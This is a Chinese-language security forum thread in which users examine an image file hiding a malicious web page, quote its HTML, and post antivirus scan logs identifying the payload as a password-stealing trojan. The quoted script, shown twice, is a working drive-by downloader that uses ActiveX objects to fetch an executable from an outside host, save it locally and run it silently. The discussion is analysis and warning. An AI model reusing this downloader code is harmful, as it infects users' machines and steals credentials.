【99a2f9】带毒的图片？

红心王子

知道了，红伞监控有失守的时候

icka

这个图片用记事本打开就知道了.
里面夹带着病毒网页.

1. 
   
2. 
   
3.                   
   
4. <html>
   
5. <head>
   
6. <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
   
7. <title>0.A5G'Q)</title>
   
8. </head><body>
   
9. <noscript>
   
10. <iframe src=*></iframe>
    
11. </noscript>
    
12. <script language="JavaScript">
    
13. <!--
    
14. document.writeln("<script>var ailian,zhan;ailian="htp://w.dzy520.com/0.exe";zhan="c:\game.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var chenzi=1;var fan=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var china=ado.createobject(ln+lzn+an,"");var h=1;fan.Open("GET",ailian,0);fan.Send();china.type=1;var n=1;china.open();china.write(fan.responseBody);china.savetofile(zhan,2);china.close();var chinahks=ado.createobject("ShelL.Application","");chinahks.ShelLexecute(zhan,"","","open",0);}catch(chenzi){};</script\>");
    
15. //-->
    
16. </script>
    
17. <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
    
18. <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">?
    
19. </body></html>
    

复制代码

还有个ANI的地址也是htp://w.dzy520.com/0.exe

是个老病毒地址反正,有没有更新就不知道了.

地址插GIF最后也能被触发难道?ANI那个漏洞?

icka

这个图片用记事本打开就知道了.
里面夹带着病毒网页.

1. 
   
2. 
   
3.                   
   
4. <html>
   
5. <head>
   
6. <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
   
7. <title>0.A5G'Q)</title>
   
8. </head><body>
   
9. <noscript>
   
10. <iframe src=*></iframe>
    
11. </noscript>
    
12. <script language="JavaScript">
    
13. <!--
    
14. document.writeln("<script>var ailian,zhan;ailian="htp://w.dzy520.com/0.exe";zhan="c:\game.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var chenzi=1;var fan=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var china=ado.createobject(ln+lzn+an,"");var h=1;fan.Open("GET",ailian,0);fan.Send();china.type=1;var n=1;china.open();china.write(fan.responseBody);china.savetofile(zhan,2);china.close();var chinahks=ado.createobject("ShelL.Application","");chinahks.ShelLexecute(zhan,"","","open",0);}catch(chenzi){};</script\>");
    
15. //-->
    
16. </script>
    
17. <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
    
18. <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">?
    
19. </body></html>
    

复制代码

还有个ANI的地址也是htp://w.dzy520.com/0.exe

是个老病毒地址反正,有没有更新就不知道了.

地址插GIF最后也能被触发难道?ANI那个漏洞?

mhj144007

2樓那帖放毒 ...

The EQs

Scan performed at: 2007-6-25 12:18:05
Scanning Log
NOD32 version 2350 (20070624) NT
Command line: C:\Documents and Settings\EQ2\桌面\0.exe
Operating memory - is OK

Date: 25.6.2007  Time: 12:18:10
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\0.exe
C:\Documents and Settings\EQ2\桌面\0.exe - a variant of Win32/PSW.Delf.NHI trojan
Number of scanned files: 1
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 12:18:10 Total scanning time: 0 sec (00:00:00)

wangjay1980

detected: Trojan program Trojan-PSW.Win32.Delf.qc        URL: http://w.dzy520.com/0.exe//UPX

wangfeng66

DRWEB 4.33 扫描PASS

lacmiu

没毒啊
小红伞和BD都没反应

欠妳緈諨

番茄已经把2楼带毒的帖子处理了